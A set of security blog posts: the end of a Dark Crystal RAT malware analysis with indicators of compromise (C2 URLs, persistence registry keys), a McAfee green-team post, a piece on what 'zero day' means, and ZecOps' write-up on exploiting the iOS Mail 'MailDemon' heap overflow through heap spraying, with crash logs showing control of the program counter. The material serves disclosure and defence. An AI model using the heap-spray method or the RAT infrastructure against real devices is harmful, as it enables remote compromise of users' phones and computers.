After reverse engineering Dark Crystal RAT, we continued reconnaissance to see what additional information we could find. One limitation to our analysis was that we did not wish to allow the sample to communicate with the real C2, so we kept it isolated from the Internet. To learn more about Dark Crystal RAT we tried two approaches: the first was to browse the Dark Crystal RAT website (files.dcrat[.]ru) using Tor, and the other was to take a look at YouTube videos of others’ experiments with the “real” Dark Crystal RAT server.

Dark Crystal RAT Website

We found that Dark Crystal RAT has a website at files.dcrat[.]ru, shown in Figure 17. Observe that there are options to download the RAT itself, as well as a few plugins; the DCLIB extension is consistent with the plugin loading code we found in the RAT.


Figure 17: The website files.dcrat[.]ru allows users to download Dark Crystal RAT and some of its plugins

Figure 18 shows some additional plugins, including plugins with the ability to resist running in a virtual machine, disable Windows Defender, and disable webcam lights on certain models. No plugins were bundled with the sample we studied.


Figure 18: Additional plugins listed on the Dark Crystal RAT website

Figure 19 lists software downloads on the RAT page. We took some time to look at these files; here are some interesting things we discovered:

  • The DCRat listed on the website is actually a “builder” that packages a build of the RAT and a configuration for the attacker to deploy. This is consistent with the name DCRatBuild.exe shown back in Figure 4. In our brief testing of the builder, we found that it had a licensing check. We did not pursue bypassing it once we found public YouTube videos of the DCRat builder in operation, as we show later.
  • The DarkCrystalServer is not self-contained, rather, it is just a PHP file that allows the user to supply a username and password, which causes it to download and install the server software. Due to the need to supply credentials and communicate back with dcrat[.]ru (Figure 20), we did not pursue further analysis of DarkCrystalServer.


Figure 19: The RAT page lists software for the RAT, the server, an API, and plugin development


Figure 20: The DarkCrystalServer asks for a username and password and calls back to dcrat[.]ru to download software, so we did not pursue it further

YouTube Videos

As part of confirming our findings about Dark Crystal RAT capabilities that we obtained through reverse engineering, we found some YouTube demonstrations of the DCRat builder and server.

The YouTube user LIKAR has a YouTube demonstration of Dark Crystal RAT. The author demonstrates use of the Dark Crystal RAT software on a server with two active RAT instances. During the video, the author browses through the various screens in the software. This made it easy to envision how a cyber threat would use the RAT, and to confirm our suspicions of how it works.

Figure 21 shows a capture from the video at 3:27. Note that the Dark Crystal RAT builder software refers to the DCRatBuild package as a “server” rather than a client. Nonetheless, observe that one of the options was a type of Java, or C# (Beta). By watching this YouTube video and doing some additional background research, we discovered that Dark Crystal RAT has existed for some time in a Java version. The C# version is relatively new. This explained why we could not find much detailed prior reporting about it.


Figure 21: A YouTube demonstration revealed that Dark Crystal RAT previously existed in a Java version, and the C# version we analyzed is in beta

Figure 22 shows another capture from the video at 6:28. The functionality displayed on the screen lines up nicely with the “msgbox”, “browseurl”, “clipboard”, “speak”, “opencd”, “closecd”, and other capabilities we discovered and enumerated in Table 6.


Figure 22: A YouTube demonstration confirmed many of the Dark Crystal RAT capabilities we found in reverse engineering

Conclusion

In this post we walked through our analysis of the sample that the threat intel team provided to us and all its components. Through our initial triage, we found that its “dfsds.exe” component is Dark Crystal RAT. We found that Dark Crystal RAT was a .NET executable, and reverse engineered it. We extracted the malware’s configuration, and through dynamic analysis discovered the syntax of its C2 communications. We implemented a small proof-of-concept server to test the correct format of commands that can be sent to the malware, and how to interpret its uploaded screenshots. Finally, we took a second look at how actual threat actors would download and use Dark Crystal RAT.

To conclude, indicators of compromise for this version of Dark Crystal RAT (MD5: 047af34af65efd5c6ee38eb7ad100a01) are given in Table 4.

Indicators of Compromise

Dark Crystal RAT (dfsds.exe)

Handle artifacts

 

Mutex name

bc2dc004028c4f0303f5e49984983352

Registry artifacts

 

Registry value

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\scrss

Registry value

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Wininit

File system artifacts

 

File

C:\Sysdll32.lnk

File

%APPDATA%\dotNET.lnk

File

Start Menu\Programs\Startup\Sysdll32.lnk

File

Start Menu\Programs\Startup\dotNET.lnk

File

%APPDATA%\<random process name>.exe

File

C:\<random process name>.exe

Network artifacts

 

HTTP request

hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91due
u3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9kl
vv3/212bad81b4208a2b412dfca05f1d9fa7.php?data=active

HTTP request

hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91due
u3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9kl
vv3/akcii239myzon0xwjlxqnn3b34w212bad81b4208a2b412dfca05f1d9f
a7.php? type=__ds_getdata&__ds_getdata_user=<user_hash>&__ds_getdata_ex
t=<message_hash>&__ds_getdata_key=<key>

HTTP request

hxxp://domalo[.]online /ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp
1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xw
jlxqnn3b34w/<user_hash>.<message_hash>

TCP connection

domalo[.]online:80

TCP connection

ipinfo[.]ip

DNS lookup

domalo[.]online

DNS lookup

ipinfo[.]ip

Strings

 

Static string

DCRatBuild

Table 4: IoCs for this instance of DCRat

FireEye Product Support for Dark Crystal RAT

Table 5 describes how FireEye products react to the initial sample (MD5: b478d340a787b85e086cc951d0696cb1) and its Dark Crystal RAT payload, or in the case of Mandiant Security Validation, allow a stakeholder to validate their own capability to detect Dark Crystal RAT.

FireEye Product

Support for Dark Crystal RAT

FireEye Network Security (NX)

Backdoor.Plurox detection

FireEye Email Security (EX & ETP)

Backdoor.MSIL.DarkCrystal, Backdoor.Plurox, Malware.Binary.exe, Trojan.Vasal.FEC3, Win.Ransomware.Cerber-6267996-1, fe_ml_heuristic detections

FireEye Endpoint Security (HX)

Trojan.GenericKD.32546165, Backdoor.MSIL.DarkCrystal detections

FireEye Malware Analysis (AX)

Backdoor.Plurox.FEC2 detection

FireEye Detection on Demand (DoD)

Backdoor.Plurox.FEC2, FireEye.Malware detections

Mandiant Security Validation

Built-in Action coming soon

Table 5: Support in FireEye products to detect Dark Crystal RAT or validate detection capability

Making Moves to Go Green at McAfee Waterloo

By Gurjeet, Software Engineer, Canada

“We should protect Mother Earth. If we don’t take care of her, she won’t take care of us.”

This was my kindergartner’s response when I asked what he was doing while I watched him carefully dispose of forgotten candy wrappers outside of the school.

His answer led me to down an unexpected path to become a member of McAfee’s Green Team in the Waterloo office.

Inspired to Go Green

After that day in the schoolyard, I joined my son’s cleanup efforts, rather than idly waiting in the school pickup zone. Soon, other parents rolled up their sleeves to help improve our children’s environment.

Inspired by the momentum, I reexamined my household’s plastic consumption and recycling habits.

I felt pretty goodafter all, I was doing my part to better our environmentuntil I read my colleague’s LinkedIn post:

“Who uses their trash bin at their desk? Consider using the bin in a break room or hallway to decrease your plastic consumption.”

He was right. I often used the bin at my desk, which is emptied nightly, regardless if it only held one item. I was contributing to plastic consumption at the office. My colleague’s simple act of raising awareness struck a chord with me. I could do more. By doing small things, I could make a big difference at McAfee.

The next day, I approached my colleague and we collaborated to launch Waterloo’s Green Team.

Actions in Year One

Excited by the possibilities, we gathered a few other team members and identified small changes we could make for a big impact. Outside of raising awareness, we narrowed our focus to three:

  1. Decreased plastics: Our Waterloo office was dependent on paper and plastic products. We replaced plastic cutlery and cups with real spoons, forks, plates, glassware and coffee mugs.
  2. Added bin stations and labels: To my colleague’s point, the trash bins would be emptied at each individual desk, even if there was only one item. We removed individual bins and invested in recycling and trash stations at convenient locations throughout the building. We also created signage that better defined what could be added to each bin.
  3. Gifted reusable tote bags: To decrease the amount of plastic coming in from outside the building, such as disposable lunch bags, and encourage others to do the same, we offered reusable tote bags to our Waterloo team members.

Our grassroots efforts during the first year was just the start. We continue to plan for the year ahead, and as McAfee launches additional green teams around the world, we plan to collaborate to make an even greater impact.

Lessons Learned

One person can make an impact. Small changes add up. These are my biggest takeaways.

My son’s small action in the schoolyard reverberated throughout my household, and eventually McAfee, when I found passion and purpose that I didn’t realize I had. You can make a difference.

My unexpected journey also held unexpected lessons. While incredibly rewarding, my day job as a software engineer doesn’t afford many opportunities to organize events, speak in public or mobilize people. Through my involvement in the Green Team, I uncovered skills I didn’t know existed.

I’m proud to work for a company that supports employees in their passions, especially when it’s for a more sustainable future for us all.

Interested in joining a company that supports green initiatives? Search our openings.

The post Making Moves to Go Green at McAfee Waterloo appeared first on McAfee Blogs.

What the hell does “zero day” even mean anymore?

I seem to have spent a fair amount of my time recently talking to a variety of people about “zero days” and the one thing that has really struck me is that almost everyone has a different view on what a “zero day” actually is….so I figured the time had come to try and add a little clarity to the situation.

For those of you really short on time, let’s be clear – zero days do exist, and they can be highly damaging, but there are many other things both easier to fix and with a greater Return on Investment for most organizations. So, step 1 should be to fix things like patching and user education before devoting limited resources to the actually tiny minority of truly zero day attacks.

And for those of you with a little more time on your hands, let’s examine why that last paragraph recommends what it does. First things first, we should talk about vulnerabilities and exploits because whilst the 2 are clearly linked they are, of course, very different. In simple terms a vulnerability is a weakness or error in a piece of code. An exploit is a separate piece of code that takes advantage of that vulnerability to enable the bad guys to achieve their goals.

The term “zero day” is valid in both contexts. It’s typically used in reference to an exploit – but not always – and in my experience, that creates some of the confusion. As a side note, in the fast-moving world of IT security and malware, confusion among security teams can only ever be a bad thing for those of us working hard to stop the bad guys from profiting. I will try to be clear in which context I’m using it throughout this blog.

So, let’s take a look at some of the more common interpretations of “zero day” and examine which ones are valid:

1) “No signature exists in my current antivirus so it can’t detect this ‘zero day’ malware.”

There are more than 725,000 new malware files released each day, but the vast majority of this is simply recompiled versions of existing malware with a new file hash. A new hash does not equal zero day malware.

2) “I’ve never seen a piece of malware get delivered like that before”

Cyber criminals are always looking for a new way to deliver their payloads and they can be pretty creative, but the moniker zero day should be reserved for malware itself and not the method of distribution.

3) “There is a vulnerability in my system which I haven’t yet got around to patching.”

There are many reasons why patches are not always immediately applied (some of them are even acceptable!) but if a piece of malware ends up exploiting a known and unpatched vulnerability, that doesn’t retroactively turn this (possibly quite old) piece of malware into a zero day version.

4) “There is a whole new type of malware”

This must surely count as a ‘zero day’ right? I’m going to argue that it doesn’t. A new type of malware is likely to mean the cyber criminals have different goals. When crypto-malware (or ransomware as it’s commonly known) began to hit people in force, this indicated that the bad guys had come up with a new way to make money – extortion. But the vulnerabilities being exploited to execute their code and the mechanisms of delivering that code to their victims’ machines were the same as before….and on that basis I wouldn’t count it as ‘zero day’.

5) “I’m aware of a newly discovered vulnerability but there is no patch currently available to fix it” (or potentially such a recent patch that there has not been an opportunity to test it within my organization)

In reality this is a rare event, however I would argue that in the event there is no patch available and therefore no way to update systems to protect against the vulnerability that this can be considered to be a ‘zero-day’ vulnerability.

6) “An unknown vulnerability has been discovered and exploited by the bad guys”

In this example nobody except the cyber criminals is even aware a vulnerability exists – and therefore nobody is even trying to fix it. THIS is a true ‘zero day’ threat….fortunately though they are actually pretty rare.

So, what does all this mean from a security perspective?

That’s going to be the subject of my next blog, so watch this space…..

The post What the hell does “zero day” even mean anymore? appeared first on McAfee Blogs.

Seeing (Mail)Demons? Technique, Triggers, and a Bounty

Seeing (Mail)Demons? Technique, Triggers, and a Bounty

Impact & Key Details (TL;DR)

  1. Demonstrate a way to do a basic heap spray
  2. We were able to use this technique to verify that this vulnerability is exploitable. We are still working on improving the success rate.
  3. Present two new examples of in-the-wild triggers so you can judge by yourself if these bugs worth an out of band patch
  4. Suggestions to Apple on how to improve forensics information / logs and important questions following Apple’s response to the previous disclosure
  5. Launching a bounty program for people who have traces of attacks with total bounties of $27,337
  6. MailDemon appears to be even more ancient than we initially thought. There is a trigger for this vulnerability, in the wild, 10 years ago, on iPhone 2g, iOS 3.1.3

Following our announcement of RCE vulnerabilities discovery in the default Mail application on iOS, we have been contacted by numerous individuals who suspect they were targeted by this and related vulnerabilities in Mail.

ZecOps encourages Apple to release an out of band patch for the recently disclosed vulnerabilities and hopes that this blog will provide additional reinforcement to release patches as early as possible. In this blogpost we will show a simple way to spray the heap, whereby we were able to prove that remote exploitation of this issue is possible, and we will also provide two examples of triggers observed in the wild.

At present, we already have the following:

  • Remote heap-overflow in Mail application
  • Ability to trigger the vulnerability remotely with attacker-controlled input through an incoming mail
  • Ability to alter code execution
  • Kernel Elevation of Privileges 0day

What we don’t have:

  • An infoleak – but therein rests a surprise: an infoleak is not mandatory to be in Mail since an infoleak in almost any other process would be sufficient. Since dyld_shared_cache is shared through most processes, an infoleak vulnerability doesn’t necessarily have to be inside MobileMail, for example CVE-2019-8646 of iMessage can do the trick remotely as well – which opens additional attack surface (Facetime, other apps, iMessage, etc). There is a great talk by 5aelo during OffensiveCon covering similar topics.

Therefore, now we have all the requirements to exploit this bug remotely. Nonetheless, we prefer to be cautious  in chaining this together because:

  • We have no intention of disclosing the LPE – it allows us to perform filesystem extraction / memory inspection on A12 devices and above when needed. You can read more about the problems of analyzing mobile devices at FreeTheSandbox.org
  • We haven’t seen exploitation in the wild for the LPE.

We will also share two examples of triggers that we have seen in the wild and let you make your own inferences and conclusions. 

the mail-demon vulnerability
were you targeted by this vulnerability?

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

MailDemon Bounty

Lastly, we will present a bounty for those submissions that were able to demonstrate that they were attacked.

Exploiting MailDemon

As we previously hinted, MailDemon is a great candidate for exploitation because it overwrites small chunks of a MALLOC_NANO memory region, which stores a large number of Objective-C objects. Consequently, it allows attackers to manipulate an ISA pointer of the corrupted objects (allowing them to cause type confusions) or overwrite a function pointer to control the code flow of the process. This represents a viable approach of taking over the affected process.

Heap Spray & Heap Grooming Technique

In order to control the code flow, a heap spray is required to place crafted data into the memory. With the sprayed fake class containing a fake method cache of ‘dealloc’ method, we were able to control the Program Counter (PC) register after triggering the vulnerability using this method*.

The following is a partial crash log generated while testing our POC:

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Subtype: EXC_ARM_DA_ALIGN at 0xdeadbeefdeadbeef
VM Region Info: 0xdeadbeefdeadbeef is not in any region.  Bytes after previous region: 16045690973559045872  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      MALLOC_NANO            0000000280000000-00000002a0000000 [512.0M] rw-/rwx SM=PRV  
--->  
      UNUSED SPACE AT END

Thread 18 name:  Dispatch queue: com.apple.CFNetwork.Connection
Thread 18 Crashed:
0   ???                           	0xdeadbeefdeadbeef 0 + -2401053088876216593
1   libdispatch.dylib             	0x00000001b7732338 _dispatch_lane_serial_drain$VARIANT$mp  + 612
2   libdispatch.dylib             	0x00000001b7732e74 _dispatch_lane_invoke$VARIANT$mp  + 480
3   libdispatch.dylib             	0x00000001b773410c _dispatch_workloop_invoke$VARIANT$mp  + 1960
4   libdispatch.dylib             	0x00000001b773b4ac _dispatch_workloop_worker_thread  + 596
5   libsystem_pthread.dylib       	0x00000001b796a114 _pthread_wqthread  + 304
6   libsystem_pthread.dylib       	0x00000001b796ccd4 start_wqthread  + 4


Thread 18 crashed with ARM Thread State (64-bit):
    x0: 0x0000000281606300   x1: 0x00000001e4b97b04   x2: 0x0000000000000004   x3: 0x00000001b791df30
    x4: 0x00000002827e81c0   x5: 0x0000000000000000   x6: 0x0000000106e5af60   x7: 0x0000000000000940
    x8: 0x00000001f14a6f68   x9: 0x00000001e4b97b04  x10: 0x0000000110000ae0  x11: 0x000000130000001f
   x12: 0x0000000110000b10  x13: 0x000001a1f14b0141  x14: 0x00000000ef02b800  x15: 0x0000000000000057
   x16: 0x00000001f14b0140  x17: 0xdeadbeefdeadbeef  x18: 0x0000000000000000  x19: 0x0000000108e68038
   x20: 0x0000000108e68000  x21: 0x0000000108e68000  x22: 0x000000016ff3f0e0  x23: 0xa3a3a3a3a3a3a3a3
   x24: 0x0000000282721140  x25: 0x0000000108e68038  x26: 0x000000016ff3eac0  x27: 0x00000002827e8e80
   x28: 0x000000016ff3f0e0   fp: 0x000000016ff3e870   lr: 0x00000001b6f3db9c
    sp: 0x000000016ff3e400   pc: 0xdeadbeefdeadbeef cpsr: 0x60000000

The ideal primitive for heap spray in this case is a memory leak bug that can be triggered from remote, since we want the sprayed memory to stay untouched until the memory corruption is triggered. We left this as an exercise for the reader. Such primitive could qualify for up to $7,337 bounty from ZecOps (read more below).

Another way is using MFMutableData itself – when the size of MFMutableData is less than 0x20000 bytes it allocates memory from the heap instead of creating a file to store the content. And we can control the MFMutableData size by splitting content of the email into lines less than 0x20000 bytes since the IMAP library reads email content by lines. With this primitive we have a better chance to place payload into the address we want.

Trigger

An oversized email is capable of reproducing the vulnerability as a PoC(see details in our previous blog), but for a stable exploit, we need to take a closer look at “-[MFMutableData appendBytes:length:]“

-[MFMutableData appendBytes:length:] 
{
  int old_len = [self length];
  //...
  char* bytes = self->bytes;
  if(!bytes){
     bytes = [self _mapMutableData]; //Might be a data pointer of a size 8 heap
  }
  copy_dst = bytes + old_len;
  //...
  memmove(copy_dst, append_bytes, append_length); // It used append_length to copy the memory, causing an OOB writing in a small heap
}

The destination address of memove is ”bytes + old_len” instead of’ ‘bytes”. So what if we accumulate too much data before triggering the vulnerability? The “old_len” would end up with a very big value so that the destination address will end up in a invalid address which is beyond the edge of this region and crash immediately, given that the size of MALLOC_NANO region is 512MB.


             +----------------+0x280000000
             |                |
   bytes --> +----------------+\
             |                | +
             |                | |
             |                | |
             |    padding     | |
             |                | |
             |                | | old_len
             |                | |
             |                | |
             |                | |
             |                | +
copy_dst --> +----------------+/
             | overflow data  |
             +----------------+
             |                |
             |                |
             |                |
             |                |
             +----------------+0x2a0000000

In order to reduce the size of “padding”, we need to consume as much data as possible before triggering the vulnerability – a memory leak would be one of our candidates.

Noteworthy, the “padding” doesn’t mean the overflow address is completely random, the “padding” is predictable by hardware models since the RAM size is the same, and mmap is usually failed at the same size during our tests.

Crash analysis

This post discusses several triggers and exploitability of the MobileMail vulnerability detected in the wild which we covered in our previous blog.

Case 1 shows that the vulnerability is triggered in the wild before it was disclosed.

Case 2 is due to memory corruption in the MALLOC_NANO region, the value of the corrupted memory is part of the sent email and completely controlled by the sender.

Case 1

The following crash was triggered right inside the vulnerable function while the overflow happens. 

Coalition:           com.apple.mobilemail [521]

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x000000004a35630e //[a]
VM Region Info: 0x4a35630e is not in any region.  Bytes before following region: 3091946738
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      UNUSED SPACE AT START
--->  
      __TEXT                 000000010280c000-0000000102aec000 [ 2944K] r-x/r-x SM=COW  ...p/MobileMail]


Thread 4 Crashed:
0   libsystem_platform.dylib      	0x00000001834a5a80 _platform_memmove  + 208
       0x1834a5a74         ldnp x10, x11, [x1, #16]       
       0x1834a5a78         add x1, x1, 0x20               
       0x1834a5a7c         sub x2, x2, x5                 
       0x1834a5a80         stp x12, x13, [x0]   //[b]          
       0x1834a5a84         stp x14, x15, [x0, #16]        
       0x1834a5a88         subs x2, x2, 0x40              
       0x1834a5a8c         b.ls 0x00002ab0    

1   MIME                          	0x00000001947ae104 -[MFMutableData appendBytes:length:]  + 356
2   Message                       	0x0000000194f6ce6c -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:]  + 804
3   DAEAS                         	0x000000019ac5ca8c -[ASAccount folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 736
4   DAEAS                         	0x000000019aca3fd0 -[ASFolderItemsSyncTask handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 524
5   DAEAS                         	0x000000019acae338 -[ASItem _streamYourLittleHeartOutWithContext:]  + 440
6   DAEAS                         	0x000000019acaf4d4 -[ASItem _streamIfNecessaryFromContext:]  + 96
7   DAEAS                         	0x000000019acaf758 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 164
8   DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776
9   DAEAS                         	0x000000019acaf7d8 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 292
10  DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776
...

Thread 4 crashed with ARM Thread State (64-bit):
    x0: 0x000000004a35630e   x1: 0x00000001149af432   x2: 0x0000000000001519   x3: 0x000000004a356320
    x4: 0x0000000100000028   x5: 0x0000000000000012   x6: 0x0000000c04000100   x7: 0x0000000114951a00
    x8: 0x44423d30443d3644   x9: 0x443d30443d38463d  x10: 0x3d31413d31443d30  x11: 0x31413d31463d3444
   x12: 0x33423d30453d3043  x13: 0x433d30443d35423d  x14: 0x3d30443d36443d44  x15: 0x30443d38463d4442
   x16: 0x00000001834a59b0  x17: 0x0200080110000100  x18: 0xfffffff00a0dd260  x19: 0x000000000000152b
   x20: 0x00000001149af400  x21: 0x000000004a35630e  x22: 0x000000004a35630f  x23: 0x0000000000000008
   x24: 0x000000000000152b  x25: 0x0000000000000000  x26: 0x0000000000000000  x27: 0x00000001149af400
   x28: 0x000000018dbd34bc   fp: 0x000000016da4c720   lr: 0x00000001947ae104
    sp: 0x000000016da4c720   pc: 0x00000001834a5a80 cpsr: 0x80000000

With [a] and [b] we know that the process crashed inside “memmove” called by “-[MFMutableData appendBytes:length:]”, which means the value of “copy_dst” is an invalid address at first place which is 0x4a35630e.

So where did the value of the register x0 (0x4a35630e) come from? It’s much smaller than the lowest valid address. 

Turns out that the process crashed when after failing to mmap a file and then failing to allocate the 8 byte memory at the same time. 

The invalid address 0x4a35630e is actually the offset which is the length of MFMutableData before triggering the vulnerability(i.e. “old_len”). When calloc fails to allocate the memory it returns NULL, so the copy_dst will be “0 + old_len(0x4a35630e)”. 

In this case the “old_len” is about 1.2GB which matches the average length of our POC which is likely to cause mmap failure and trigger the vulnerability.

Please note that x8-x15, and x0 are fully controlled by the sender.

The crash gives us another answer for our question above: “What if we accumulate too much data before triggering the vulnerability?” – The allocation of the 8-bytes memory could fail and crash while copying the payload to an invalid address. This can make reliable exploitation more difficult, as we may crash before taking over the program counter.

A Blast From The Past: Mysterious Trigger on iOS 3.1.3 in 2010!

Noteworthy, we found a public example of exactly a similar trigger by an anonymous user in modmy.com forums: https://forums.modmy.com/native-iphone-ipod-touch-app-launches-f29/734050-mail-app-keeps-crashing-randomly.html

Vulnerable version: iOS 3.1.3 on iPhone 2G
Time of crash: 22nd of October, 2010

The user “shyamsandeep”, registered on the 12th of June 2008 and last logged in on the 16th of October 2011 and had a single post in the forum, which contained this exact trigger.

This crash had r0 equal to 0x037ea000, which could be the result of the 1st vulnerability we disclosed in our previous blog which was due to ftruncate() failure. Interestingly, as we explained in the first case, it could also be a result of the allocation of 8-bytes memory failure however it is not possible to determine the exact reason since the log lacked memory regions information. Nonetheless, it is certain that there were triggers in the wild for this exploitable vulnerability since 2010.

Identifier: MobileMail
Version: ??? (???)
Code Type: ARM (Native)
Parent Process: launchd [1]

Date/Time: 2010-10-22 08:14:31.640 +0530
OS Version: iPhone OS 3.1.3 (7E18)
Report Version: 104

Exception Type: EXC_BAD_ACCESS (SIGSEGV) Exception Codes: KERN_INVALID_ADDRESS at 0x037ea000 Crashed Thread: 4
Thread 4 Crashed:
0 libSystem.B.dylib 0x33aaef3c 0x33aad000 + 7996 //memcpy + 0x294
1 MIME 0x30a822a4 0x30a7f000 + 12964 //_FastMemoryMove + 0x44
2 MIME 0x30a8231a 0x30a7f000 + 13082 // -[MFMutableData appendBytes:length:] + 0x6a
3 MIME 0x30a806d6 0x30a7f000 + 5846 // -[MFMutableData appendData:] + 0x32
4 Message 0x342e2938 0x34251000 + 596280 // -[DAMessageContentConsumer consumeData:length:format:mailMessage:] + 0x25c
5 Message 0x342e1ff8 0x34251000 + 593912 // -[DAMailAccountSyncConsumer consumeData:length:format:mailMessage:] +0x24
6 DataAccess 0x34146b22 0x3413e000 + 35618 // -[ASAccount
folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:] + 0x162
7 DataAccess 0x3416657c 0x3413e000 + 165244 //[ASFolderItemsSyncTaskhandleStreamOperation:forCodePage:tag:withParentIt em:withData:dataLength:] + 0x108
...

Thread 4 crashed with ARM Thread State:
r0: 0x037ea000 r1: 0x008729e0 r2: 0x00002205 r3: 0x4e414153
r4: 0x41415367 r5: 0x037e9825 r6: 0x00872200 r7: 0x007b8b78
r8: 0x0001f825 r9: 0x001fc098 r10: 0x00872200 r11: 0x0087c200
ip: 0x0000068a sp: 0x007b8b6c lr: 0x30a822ab pc: 0x33aaef3c
cpsr: 0x20000010

Case 2

Following is another crash that happened after an email was received and processed.

Coalition:           com.apple.mobilemail [308]

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x0041004100410041 // [a]
VM Region Info: 0x41004100410041 is not in any region.  Bytes after previous region: 18296140473139266  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      mapped file            00000002d31f0000-00000002d6978000 [ 55.5M] r--/rw- SM=COW  ...t_id=9bfc1855
--->  
      UNUSED SPACE AT END

Thread 13 name:  Dispatch queue: Internal _UICache queue
Thread 13 Crashed:
0   libobjc.A.dylib               	0x00000001b040fca0 objc_release  + 16
       0x1b040fc94         mov x29, sp                    
       0x1b040fc98         cbz x0, 0x0093fce4             
       0x1b040fc9c         tbnz x0, #63, 0x0093fce4       
       0x1b040fca0         ldr x8, [x0]            // [b]       
       0x1b040fca4         and x8, x8, 0xffffffff8        
       0x1b040fca8         ldrb w8, [x8, #32]             
       0x1b040fcac         tbz w8, #2, 0x0093fd14         

1   CoreFoundation                	0x00000001b1119408 -[__NSDictionaryM removeAllObjects]  + 600
2   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
3   libdispatch.dylib             	0x00000001b0c0bc1c _dispatch_lane_barrier_sync_invoke_and_complete  + 56    
4   UIFoundation                  	0x00000001bb9136b0 __16-[_UICache init]_block_invoke  + 76     
5   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
6   libdispatch.dylib             	0x00000001b0c0201c _dispatch_continuation_pop$VARIANT$mp  + 412
7   libdispatch.dylib             	0x00000001b0c11fa8 _dispatch_source_invoke$VARIANT$mp  + 1308
8   libdispatch.dylib             	0x00000001b0c0ee00 _dispatch_kevent_worker_thread  + 1224   
9   libsystem_pthread.dylib       	0x00000001b0e3e124 _pthread_wqthread  + 320          
10  libsystem_pthread.dylib       	0x00000001b0e40cd4 start_wqthread  + 4 


Thread 13 crashed with ARM Thread State (64-bit):
    x0: 0x0041004100410041   x1: 0x00000001de1ac18a   x2: 0x0000000000000000   x3: 0x0000000000000010
    x4: 0x00000001b0c60388   x5: 0x0000000000000010   x6: 0x0000000000000000   x7: 0x0000000000000000
    x8: 0x0000000281f94090   x9: 0x00000001b143f670  x10: 0x0000000142846800  x11: 0x0000004b0000007f
   x12: 0x00000001428468a0  x13: 0x000041a1eb487861  x14: 0x0000000283ed9d10  x15: 0x0000000000000004
   x16: 0x00000001eb487860  x17: 0x00000001b11191b0  x18: 0x0000000000000000  x19: 0x0000000281dce4c0
   x20: 0x0000000282693398  x21: 0x0000000282693330  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000281dce4c8  x25: 0x000000000c000000  x26: 0x000000000000000d  x27: 0x00000001eb48e000
   x28: 0x0000000282693330   fp: 0x000000016b8fe820   lr: 0x00000001b1119408
    sp: 0x000000016b8fe820   pc: 0x00000001b040fca0 cpsr: 0x20000000

[a]: The pointer of the object was overwritten with “0x0041004100410041” which is AAAA in unicode. 

[b] is one of the instructions around the crashed address we’ve added for better understanding, the process crashed on instruction “ldr x8, [x0]” while -[__NSDictionaryM removeAllObjects] was trying to release one the objects.

By reverse engineering -[__NSDictionaryM removeAllObjects], we understand that register x0 was loaded from x28(0x0000000282693330), since register x28 was never changed before the crash.

Let’s take a look at the virtual memory region information of x28: 0x0000000282693330, the overwritten object was stored in MALLOC_NANO region which stores small heap chunks. The heap overflow vulnerability corrupts the same region since it overflows on a 8-bytes heap chunk which is also stored in MALLOC_NANO.

  MALLOC_NANO         	 0x0000000280000000-0x00000002a0000000	 rw-/rwx

This crash is actually pretty close to controlling the PC since it controls the pointer of an Objective-C object. By pointing the value of register x0 to a memory sprayed with a fake object and class with fake method cache, the attackers could control the PC pointer, this phrack blog explains the details.

Summary

  1. It is rare to see that user-provided inputs trigger and control remote vulnerabilities. 
  2. We prove that it is possible to exploit this vulnerability using the described technique.
  3. We have observed real world triggers with a large allocation size.
  4. We have seen real world triggers with values that are controlled by the sender.
  5. The emails we looked for were missing / deleted.
  6. Success-rate can be improved. This bug had in-the-wild triggers in 2010 on an iPhone 2G device.
  7. In our opinion, based on the above, this bug is worth an out of band patch.

How Can Apple Improve the Logs?

The lack of details in iOS logs and the lack of options to choose the granularity of the data  for both individuals and organizations need to change to get iOS to be on-par with MacOS, Linux, and Windows capabilities. In general, the concept of hacking into a phone in order to analyze it, is completely flawed and should not  be the normal way to do it.

We suggest Apple improve its error diagnostics process to help individuals, organizations, and SOCs to investigate their devices. We have a few helpful technical suggestions:

  1. Crashes improvement: Enable to see memory next to each pointer / register
  2. Crashes improvement: Show stack / heap memory / memory near registers
  3. Add PIDs/PPIDs/UID/EUID to all applicable events
  4. Ability to send these logs to a remote server without physically connecting the phone – we are aware of multiple cases where the logs were mysteriously deleted
  5. Ability to perform complete digital forensics analysis of suspected iOS devices without a need to hack into the device first.

Questions for Apple

  • How many triggers have you seen to this heap overflow since iOS 3.1.3? 
  • How were you able to determine within one day that all of the triggers to this bug were not malicious and did you actually go over each event ? 
  • When are you planning to patch this vulnerability?
